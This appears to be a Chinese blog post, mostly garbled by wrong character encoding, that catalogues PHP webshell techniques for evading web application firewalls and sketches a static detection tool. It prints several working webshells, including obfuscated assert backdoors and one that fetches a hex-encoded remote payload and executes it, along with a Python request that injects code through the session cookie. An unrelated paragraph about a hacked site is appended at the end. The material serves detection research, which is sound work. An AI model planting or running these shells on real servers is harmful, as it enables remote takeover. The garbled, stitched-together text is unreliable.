xiejianming 2019-06-25
åè¨
ä¹åå¨Webshellæ¥æçæ°æè·¯ä¸çäºä¸ä¸ªå ️ï¼å½æ¶æ²¡ææ¾å°å·ä½æ¾å°å¨é¨åéçæ¹æ³ï¼åæ¥éè¿å¦ä¹ æ¾å°äºä¸ªæå°å¨é¨éçæ¹æ³ï¼å¹¶å次å¦ä¹ äºä¸PHP webshellç»è¿WAFçæ¹æ³ï¼ä»¥æ¤æ¥éªè¯ä¸æ¤æ¹æ³æ¯å¦åçã
å¦æé误ï¼è¿è¯·æåºï¼ä¸èææ¿ï¼ :turtle:æ
å¨é£ç¯æç« ä¸æçªç¶æ³å°ä¸ç§æ£æµwebshellçæ¹æ³ï¼å°±æ¯é¦åè·åå°å½åæ件ä¸çææåéï¼ä¸æç½çå¯ä»¥åå»çä¸ä¹åçæç« ï¼ï¼ç¶ååæ ¹æ®æ£ååºè¿è¡éææ£æµã
èªè®¤ä¸ºè¿ç§æ¹æ³è½ç¶ä¼æ£æµä¸å®å¨ï¼æ¯ä¸ªæ£æµæºå¶é½ä¸è½ä¿éå¨é¨ææï¼ï¼ä½æ¯æè§é常ç®åãå®ç¨ï¼ä¹æ²¡é£ä¹å¤é«æ·±çéçã
为äºéªè¯è¯¥æ£æµæºå¶ï¼é¦åäºè§£ä¸ç®åPHP webshellç»è¿WAFçæ¹æ³ã
常è§ç»è¿WAFçPHP webshell
å符串åå½¢
大å°åãç¼ç ãæªåãæ¿æ¢ãç¹æ®å符æ¼æ¥ãnullãå车ãæ¢è¡ãç¹æ®å符串干æ°
<?php $a = base64_decode("YXNzYXNz+00000____"); $a = substr_replace($a,"ert",3); $a($_POST['x']); ?> ucwords() ucfirst() trim() substr_replace() substr() strtr() strtoupper() strtolower() strtok() str_rot13() chr() gzcompress()ãgzdeflate()ãgzencode() gzuncompress()ãgzinflate()ãgzdecode() base64_encode() base64_decode() pack() unpack()
èªåå½æ°
å©ç¨ assert()
<?php function test($a){ $a($_POST['x']); } test(assert); ?>
åè°å½æ°
<?php call_user_func(assert,array($_POST[x])); ?> call_user_func_array() array_filter() array_walk() array_map() registregister_shutdown_function() register_tick_function() filter_var() filter_var_array() uasort() uksort() array_reduce() array_walk() array_walk_recursive() forward_static_call_array()
ç±»
å©ç¨éæ¯æ¹æ³ãææå½æ° __destruct() ï¼ __construct()
<?php class test { public $a = ''; function __destruct(){ assert("$this->a"); } } $b = new test; $b->a = $_POST['x']; ?>
å©ç¨å¤é¨æ件
å©ç¨ curl , fsockopen çåèµ·ç½ç»è¯·æ±åç»å file_get_contents
<?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*", '687474703a2f2f7777772e77326e31636b2e636f6d2f7368656c6c2f312e6a7067'),uniqid())),3649); @preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null); ?>
æ å符ç¹å¾é©¬
ç¼ç ãå¼æãèªå¢
<?php $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert'; $__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST'; $___=$$__; $_($___[_]); // assert($_POST[_]); ?>
ç¹æ®è¯·æ±å¤´
å©ç¨ getallheaders()
<?php $cai=getallheaders()['cai']; $dao=getallheaders()['dao']; if($cai!="" and $dao!=""){ $cai=gzuncompress(base64_decode($cai));$cai(gzuncompress(base64_decode($dao))); } header('HTTP/1.1 404 Not Found'); ?>
å¨å±åé
å©ç¨ getenv() ï¼ arrag_flip() ï¼ get_defined_vars() ï¼ session_id()
import requests url = 'http://localhost/?code=eval(hex2bin(session_id(session_start())));' payload = "phpinfo();".encode('hex') cookies = { 'PHPSESSID':payload } r = requests.get(url=url,cookies=cookies) print r.content
PHPæ··æ·å 解å¯
以phpjiami为ä¾
å°±æ¯å°å½æ°åãåéåå¨é¨åæâä¹±ç âï¼ä¸æ¹å¨ä»»æä¸ä¸ªå°æ¹ï¼é½å°å¯¼è´æ件ä¸è½è¿è¡ãå·ä½å¯è®¿é®ï¼ https://www.phpjiami.com/
PHP webshellæ£æµæ¹æ³
ç®åææäºè§£çwebshellæ£æµæ¹å¼æï¼
å®ä¾å±ç¤º
è¿é以PHPjiamiçwebshell为ä¾ï¼å¶ä¸ 2.php å³ä¸ºphpjiamaçæ¨é©¬
å¯ä»¥ææ¾çå°ææ¾çwebshellè§åäºï¼è¿æ ·åç¨éæè§åãæ£åçå³å¯è½»æ¾æ£æµå°ã
ç®åæ£æµæè·¯
æ£æµæè·¯ï¼
æ件ä¸ä¼ ->æ件åå«->è·åæææ件ä¸çåéå°ä¸´æ¶æ件ä¸->éæè§åå¹é临æ¶æ件->è¿åå¹éç»æ
âââ __init__.py
âââ conf
â âââ __init__.py
â âââ config.py
âââ core
â âââ __init__.py
â âââ all_check.py
â âââ data_mysql.py
â âââ file_inotify.py
âââ lib
â âââ __init__.py
â âââ semantic_analysis_api.py
âââ test
â âââ __init__.py
â âââ file_md5_move.py
â âââ os_check.py
â âââ random_file_test.py
â âââ ...
âââ web
â âââ static
â â âââ css
â â â âââ main.css
â â âââ images
â â â âââ background.jpg
â â âââ js
â â âââ upload.js
â âââ templates
â â âââ index.html
â âââ upload_file.php
â âââ include_file_to_tmp.php
âââ webshell_check.py
confä¸åå«çæ¯è¯¸å¦ä¸åçéææ£æµè§å
æ»ç»
以ä¸å°±æ¯è¿ç¯æç« çå¨é¨å容äºï¼å¸ææ¬æçå容对大家çå¦ä¹ æèå·¥ä½å·æä¸å®çåèå¦ä¹ ä»·å¼ï¼è°¢è°¢å¤§å®¶å¯¹èæ¬ä¹å®¶çæ¯æã
本站服务器经过更换2012版后 网站经常被人拿WEBSHELL篡改文件!找了半天也找不到漏洞在哪好在微信好友Carry的帮忙下找出了漏洞,并给出了以下的修改方案我是根据方案3修复的,在这里给大家分享下
首先使用REQUEST方法接收url中e参数传递的值,然后把$_POST[‘POST‘]赋值给arr数组,然后把arr数组中的每个键值传给base64_decode函数,最终构成一句话木马assert